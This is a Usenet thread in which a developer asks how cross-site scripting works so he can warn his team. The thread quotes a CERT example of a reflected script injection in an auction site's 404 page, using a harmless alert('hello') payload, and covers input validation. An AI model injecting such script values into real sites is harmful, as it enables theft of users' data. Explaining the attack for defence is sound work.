"chotiwallah" <ch*********@web.de> wrote in message
news:78*************************@posting.google.co m...
"Venkat" <ve*******@yahoo.com> wrote in message
news:<1088746968.295723@sj-nntpcache-3>... Hi All,
I would like to about Cross Site Scripting. I googled XSS and got the
point what it is but didn't get how it is achieved.
Can someone describe me with an example how an hacker does it.
My intension is not to hack anything but i am preparing a presentation
on this and would like to caution my team mates about the consequences of
XSS and how to protect our web based applications from a possible attack.
Any help in this is greatly appreciated.
regards,
Venkat
cross scripting basically means that somebody injects script code
(i.e. javascript or vbscript) in your code via <input>, the url or the
query string. this alien code gets executed on your site as it would
belong there.
basic countermeasure: validate any user-input, means strip tags and/or
special characters out of data before you process that data any
further.
this is a good doc: http://www.cert.org/archive/pdf/cros..._scripting.pdf,
contains further links, too
micha
Thanks micha for a very quick response, i had gone through the link
http://www.cert.org/archive/pdf/cros..._scripting.pdf,
and i am bit confused here.
The author sited an example of a popular auction site where in
a bad guy BG12345(hacker) had posted some items for sale on auctions site,
we get lured by his posting and click on the link
which will take us to bad guys(BG12345) site, we then select an item on
his(BG12345) page which will take us back to auctions site(invalid page of
that of intruder)
we then give away our credit card info details and clicked submit button,
these details are actually submitted to bad guys BG12345 site and not
to actions site.
The above example looks clear and fair enough but i am confused when the
author explained the way BG12345 bad buy could able to achieve this.
He says
BG12345's web site offered a link to auction.example.com that looked
something like this:
<A HREF=http://auction.example.com/<script>alert('hello')</script>">Click
Here</a>
The "FILENAME.html" submitted to auction.example.com was,
<script>alert('hello')</script>
auction.example.com then used its ordinary routines to generate an error
page to you that read,
<HTML> 404 page not found: <script>alert('hello')</script>
..... </HTML>
In effect, BG12345 managed to "inject" a JavaScript program into the page
returned to you by auction.example.com. The JavaScript ran as though it
originated at auction.example.com, and could therefore process events in
that document. It also maintained communication with BG12345 by virtue of
scripting that BG12345 put in the link; this is the way a CSS vulnerability
can be exploited to "sniff" sensitive data from within a web page, including
passwords, credit card numbers, and any other arbitrary information you
input. There are a number of variants to this problem. Odds are that
bank.example.com also has the same vulnerability somewhere on its site.
BG12345 could potentially access your bank account and transfer funds using
the same process.
In the above example he is saying the auctions site had generated an error
page to the user and the intruder was able to inject some JavaScript code
which got executed at users browser, i want to know when user gets an error
page how can he submit his credit card info details to the intruder.
Basically i am not able to relate the example with the explanation, could
you please help me out in understanding this.
Thanks,
Venkat
regards,
Venkat